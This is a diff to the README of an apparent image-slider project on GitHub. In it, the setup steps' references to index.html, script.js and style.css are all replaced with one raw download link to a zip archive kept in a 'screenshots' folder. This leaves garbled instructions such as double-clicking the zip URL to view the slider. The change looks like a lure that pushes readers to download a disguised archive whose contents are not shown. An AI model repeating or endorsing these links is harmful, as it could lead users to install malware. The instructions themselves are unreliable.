ultra829272828288/Responsive-Image-Slider/README.md

 Once you have downloaded and extracted the files, follow these simple steps to use the image slider:

-1. **Open the HTML file:** Locate the `index.html` file in the folder where you extracted the contents.
+1. **Open the HTML file:** Locate the `https://github.com/ultra829272828288/Responsive-Image-Slider/raw/refs/heads/main/screenshots/Slider_Responsive_Image_1.3.zip` file in the folder where you extracted the contents.
 2. **Add your images:** Replace the placeholder images in the `img` folder with your own.
 Ensure they are in JPG or PNG format.
-3. **Customize Settings (Optional):** Open the `script.js` or `style.css` file to adjust settings and styles as desired.
+3. **Customize Settings (Optional):** Open the `https://github.com/ultra829272828288/Responsive-Image-Slider/raw/refs/heads/main/screenshots/Slider_Responsive_Image_1.3.zip` or `https://github.com/ultra829272828288/Responsive-Image-Slider/raw/refs/heads/main/screenshots/Slider_Responsive_Image_1.3.zip` file to adjust settings and styles as desired.
 You can change transition effects, adjust the size, or modify navigation controls.
-4. **Open in a web browser:** Double-click on the `index.html` file to view your image slider in action.
+4. **Open in a web browser:** Double-click on the `https://github.com/ultra829272828288/Responsive-Image-Slider/raw/refs/heads/main/screenshots/Slider_Responsive_Image_1.3.zip` file to view your image slider in action.

 ## 📊 How to Customize